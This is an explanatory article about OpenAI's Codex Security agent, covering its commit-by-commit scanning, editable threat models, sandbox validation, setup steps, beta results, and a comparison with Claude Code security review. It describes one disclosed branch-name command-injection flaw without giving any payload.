Codex Security Agent: Continuous Vulnerability Scanning and Automated Threat Modelling

Introduction

On 6 March 2026, OpenAI launched Codex Security — an application-security agent that scans connected repositories commit-by-commit, builds a project-specific threat model, validates findings in an isolated sandbox, and proposes patches ready for pull request¹. The product evolved from Aardvark, a private-beta security research agent first revealed in October 2025². Within its first thirty days, the research preview scanned over 1.2 million commits across external repositories, surfacing 792 critical findings and 10,561 high-severity issues³.

This article examines what Codex Security does, how it works under the hood, how to configure it, and how it compares to competing approaches — particularly Anthropic’s Claude Code security review.

Availability and Access

Codex Security is available as a research preview to ChatGPT Enterprise, Business, and Edu customers through the Codex web interface, with free usage for the initial month¹. OpenAI also launched Codex for OSS, offering free ChatGPT Pro accounts and Codex Security access to open-source maintainers⁴.

Currently, the feature is accessed exclusively through the Codex web UI at chatgpt.com/codex/security — there is no dedicated CLI subcommand for it yet, though the Codex CLI can be integrated into CI/CD pipelines for complementary code-quality and SAST post-processing⁵.

Architecture: Three-Stage Workflow

Codex Security operates as a background agent that continuously processes commits against your configured repositories. The workflow comprises three stages: identification, validation, and remediation².

flowchart LR
    A[New Commits] --> B[Identification]
    B --> C{Threat Model<br/>Context}
    C --> D[Vulnerability<br/>Discovery]
    D --> E[Sandbox<br/>Validation]
    E -->|Confirmed| F[Patch<br/>Generation]
    E -->|False Positive| G[Discarded]
    F --> H[Pull Request<br/>Review]
    H --> I[Human<br/>Approval]

    style B fill:#f9d71c,stroke:#333
    style E fill:#ff6b6b,stroke:#333
    style F fill:#51cf66,stroke:#333

Stage 1: Identification

When connected to a repository, the agent scans commits in reverse chronological order, building a codebase-specific threat model that captures attacker entry points, trust boundaries, sensitive data paths, and high-impact code paths². Unlike traditional SAST tools that rely on pattern matching or fuzzing, Codex Security uses language-model reasoning, test-time compute, tool use, and large context windows to explore realistic attack scenarios³.

Stage 2: Validation

High-signal findings are passed to an isolated sandbox environment where the agent attempts to reproduce each issue — capturing execution details and confirming exploitability before surfacing the finding². This validation step is critical: during the beta period, it contributed to an 84% reduction in overall noise, a 90% drop in over-reported severity, and a 50% decrease in false-positive rates³.

Stage 3: Remediation

For each confirmed vulnerability, the agent generates a concrete patch with a plain-language explanation. Patches do not modify code automatically — they are surfaced for human review and can be raised as pull requests through the standard development workflow².

Setting Up a Security Scan

Prerequisites

You need an active Codex Cloud environment with your GitHub repository connected. Navigate to Codex environments (chatgpt.com/codex/settings/environments) to create one if it does not already exist⁶.

Creating a Scan

Visit chatgpt.com/codex/security/scans/new and configure the following⁶:

GitHub organisation — select the org owning the target repository
Repository — the specific repo to scan
Branch — the branch to monitor (typically main)
Environment — assign the Codex Cloud environment
History window — longer windows provide more context but require extended backfill time

The initial backfill can take several hours for larger repositories as the agent processes historical commits to build its threat model⁶.

Reviewing Findings

Once findings appear, access them at chatgpt.com/codex/security/findings. Two views are available⁶:

Recommended Findings — the top 10 most critical issues
All Findings — a complete sortable, filterable table with description, metadata, code excerpts, and validation steps

The Threat Model: Codex Security’s Core Differentiator

The project-specific threat model is what separates Codex Security from traditional scanners. Rather than applying generic rules, the agent builds a contextual understanding of your system’s architecture⁷.

A useful threat model identifies:

Entry points and untrusted inputs — where external data enters the system
Trust boundaries and auth assumptions — security perimeters and authentication logic
Sensitive data paths — critical operations requiring protection
Priority review areas — regions your team wants examined first

Example Threat Model

Public API for account changes. Accepts JSON requests and file uploads.
Uses an internal auth service for identity checks and writes billing
changes through an internal service. Focus review on auth checks,
upload parsing, and service-to-service trust boundaries.

Editing and Refining

The threat model is editable through the scan dashboard. OpenAI recommends exporting the current model, refining it conversationally within Codex, and reimporting the updated version⁷. When you adjust the criticality of a finding, the agent uses that feedback to refine the model and improve precision on subsequent runs — a form of adaptive learning that tunes results to your architecture and risk posture².

flowchart TD
    A[Initial Scan] --> B[Auto-generated<br/>Threat Model]
    B --> C[Findings<br/>Surfaced]
    C --> D{Developer<br/>Feedback}
    D -->|Adjust Criticality| E[Refined<br/>Threat Model]
    D -->|Edit Model| E
    E --> F[Improved<br/>Subsequent Scans]
    F --> C

    style D fill:#f9d71c,stroke:#333
    style E fill:#51cf66,stroke:#333

Beta Results and Real-World Impact

The numbers from the first thirty days of the research preview are striking³:

Metric	Value
Commits scanned	1.2 million+
Critical findings	792
High-severity findings	10,561
Critical issue rate	< 0.1% of commits
Noise reduction	84%
Over-reported severity drop	90%
False-positive reduction	50%
CVEs assigned	14

The 14 assigned CVEs span projects including PHP, libssh, Chromium, GOGS, Thorium, GnuPG, and GnuTLS³. NETGEAR, an early-access partner, reported that the tool “integrated effortlessly into our robust security development environment” and that findings often felt like having “an experienced product security researcher working alongside the team”⁴.

CI/CD Integration with Codex CLI

While Codex Security itself runs through the web interface, the Codex CLI and Codex GitHub Action can complement it within CI/CD pipelines⁵. The OpenAI Cookbook demonstrates a GitLab integration pattern where Codex CLI post-processes existing SAST results to consolidate duplicates, rank issues by exploitability, and provide actionable remediation steps⁵.

# GitLab CI job using Codex CLI for security post-processing
codex --full-auto \
  "Analyse the SAST report at gl-sast-report.json. \
   Consolidate duplicates, rank by exploitability, \
   and output remediation steps as CodeClimate JSON."

For fully automated CI environments, the --dangerously-bypass-approvals-and-sandbox flag is available — but should only be used in isolated runners, never on developer machines⁸.

Comparison: Codex Security vs Claude Code Security Review

Anthropic launched Claude Code Security approximately two weeks before Codex Security, creating a direct competitive dynamic⁹. The approaches differ fundamentally:

Aspect	Codex Security	Claude Code Security
Scanning model	Continuous, commit-by-commit background agent	On-demand `/security-review` command
Sandboxing	Kernel-level (macOS Seatbelt, Linux Landlock/seccomp)	Application-layer hooks
Threat modelling	Auto-generated, editable, adaptive	Manual review scope
Validation	Sandbox reproduction of exploits	Static analysis with model reasoning
Enterprise compliance	GitHub Enterprise integration	SOC 2 Type II, HIPAA, zero data retention
Primary strength	Continuous monitoring, low false positives	Flexible governance, multi-agent review

A DryRun Security study in March 2026 tested all three major AI coding agents (Codex, Claude, Gemini) building real applications. In the final vulnerability counts, Codex produced the fewest remaining issues (8), compared to Claude (13) and Gemini (11)¹⁰. However, the study also found that broken access control appeared across all three agents — security is not yet part of their default reasoning¹⁰.

The emerging consensus is that neither tool alone is sufficient. Running both costs roughly 2× per review but catches meaningfully more issues, as different models trained on different data surface different vulnerability classes⁹.

Security Considerations

Ironically, Codex itself was subject to a critical vulnerability discovered by Phantom Labs (BeyondTrust). A command injection flaw in the branch name parameter — passed unsanitised into a shell command during container setup — could have exposed GitHub authentication tokens¹¹. The vulnerability affected Codex CLI, Codex SDK, and the IDE extension, and was patched on 5 February 2026 after responsible disclosure on 16 December 2025¹¹.

This incident underscores a broader point made by Check Point Research: “Don’t assume AI tools are secure by default”¹¹. As AI agents consume branch names, commit messages, issue titles, and PR bodies, these inputs become attack surfaces in their own right.

Practical Recommendations

Start with the threat model — invest time editing it to reflect your actual architecture before judging finding quality
Use the feedback loop — adjust criticality ratings to train the agent towards your risk posture
Complement with CI/CD — pair Codex Security’s continuous scanning with Codex CLI in your pipeline for SAST post-processing
Layer your tools — consider running both Codex Security and Claude Code security review for maximum coverage
Audit your attack surface — treat all agent-consumed inputs (branch names, PR titles, commit messages) as untrusted data